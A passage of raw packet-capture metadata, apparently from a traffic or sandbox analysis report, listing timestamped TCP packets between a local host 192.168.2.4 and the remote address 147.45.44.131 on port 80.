Jan 2, 2025 19:13:04.423784018 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.423794985 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.423796892 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.423796892 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.423804998 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.423855066 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.423863888 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.423871994 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.423882008 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.423897028 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.423898935 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.423911095 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.423918962 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.423921108 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.423932076 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.423942089 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.423943996 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.423970938 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.423980951 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.423990965 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.423991919 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.424027920 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.424027920 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.425163031 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.425173998 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.425184011 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.425194979 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.425204039 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.425214052 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.425215960 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.425224066 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.425236940 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.425273895 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.427129030 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.427150965 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.427161932 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.427177906 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.427189112 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.427198887 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.427210093 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.427218914 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.427218914 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.427241087 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.427259922 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.429136038 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.429147959 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.429158926 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.429174900 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.429184914 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.429193020 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.429203033 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.429212093 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.429223061 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.429234028 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.429234982 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.429234982 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.429261923 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.431410074 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.431427002 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.431442976 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.431452036 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.431462049 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.431463003 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.431472063 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.431483030 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.431492090 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.431503057 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.431504965 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.431504965 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.431512117 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.431529045 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.431538105 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.431540012 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.431540012 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.431546926 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.431556940 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.431565046 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.431571007 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.431574106 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.431576014 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.431576014 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.431579113 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.431582928 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.431586981 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.431595087 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.431602955 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.431613922 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.431619883 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.431622028 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.431637049 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.431688070 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.509536982 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.509598970 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.509608984 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.509618044 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.509627104 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.509637117 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.509670019 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.509670019 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.509670019 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.509720087 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.509728909 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.509737968 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.509747028 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.509756088 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.509763956 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.509773016 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.509782076 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.509787083 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.509793043 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.509793043 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.509793043 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.509794950 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.509826899 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.509855032 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.509865046 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.509870052 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.509875059 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.509880066 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.509885073 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.509888887 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.509915113 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.509931087 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.510050058 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.510059118 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.510066986 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.510076046 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.510083914 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.510096073 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.510097980 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.510107994 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.510117054 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.510126114 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.510129929 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.510129929 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.510134935 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.510143995 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.510153055 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.510163069 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.510171890 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.510180950 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.510189056 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.510199070 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.510200024 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.510200024 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.510200024 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.510207891 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.510217905 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.510226965 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.510262966 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.510262966 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.510262966 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.510267019 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.510335922 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.510344982 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.510353088 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.510467052 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.510467052 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.510500908 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.510509968 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.510518074 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.510526896 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.510536909 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.510543108 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.510550976 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.510579109 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.510582924 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.510591984 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.510601044 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.510607958 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.510610104 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.510620117 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.510620117 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.510627985 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.510637999 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.510653019 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.510674000 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.510719061 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.510727882 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.510736942 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.510745049 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.510760069 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.510767937 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.510773897 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.510775089 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.510776997 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.510786057 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.510795116 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.510803938 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.510813951 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.510816097 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.510816097 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.510827065 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.510860920 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.511993885 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.512002945 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.512011051 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.512082100 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.512088060 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.512094021 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.512103081 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.512113094 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.512124062 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.512126923 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.512166977 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.512166977 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.514136076 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.514144897 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.514154911 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.514182091 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.514190912 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.514199972 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.514209032 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.514218092 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.514235973 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.514261007 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.515975952 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.515985012 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.515994072 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.516017914 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.516027927 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.516035080 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.516036034 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.516036034 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.516047955 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.516057014 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.516060114 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.516093016 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.516964912 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.516978979 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.517025948 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.517031908 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.517040014 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.517049074 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.517074108 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.517101049 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.517108917 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.517110109 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.517127991 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.517143965 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.517157078 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.517185926 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.517261028 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.517270088 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.517280102 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.517290115 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.517299891 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.517299891 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.517309904 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.517322063 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.517330885 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.517339945 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.517349958 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.517354965 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.517354965 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.517354965 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.517359018 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.517369032 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.517378092 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.517379045 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.517412901 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.517420053 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.517422915 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.517431974 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.517472029 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.517472029 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.596461058 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.596474886 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.596483946 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.596529961 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.596554995 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.596565008 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.596574068 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.596586943 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.596596956 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.596606016 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.596610069 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.596615076 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.596623898 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.596633911 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.596638918 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.596638918 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.596638918 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.596645117 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.596652985 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.596662045 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.596668005 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.596681118 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.596685886 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.596685886 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.596693039 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.596700907 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.596714973 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.596724987 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.596735001 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.596735954 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.596745968 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.596745968 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.596771002 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.597445965 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.597461939 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.597470045 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.597513914 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.597522974 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.597531080 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.597531080 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.597531080 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.597558022 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.597560883 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.597573996 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.597583055 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.597598076 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.597598076 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.597609043 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.597609997 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.597619057 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.597629070 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.597671032 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.597671032 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.597701073 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.597709894 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.597718000 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.597732067 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.597742081 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.597745895 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.597750902 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.597760916 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.597767115 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.597769976 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.597795010 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.597805023 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.597811937 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.597815037 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.597824097 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.597831011 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.597840071 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.597851038 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.597853899 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.597853899 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.597888947 CET	80	49731	147.45.44.131	192.168.2.4
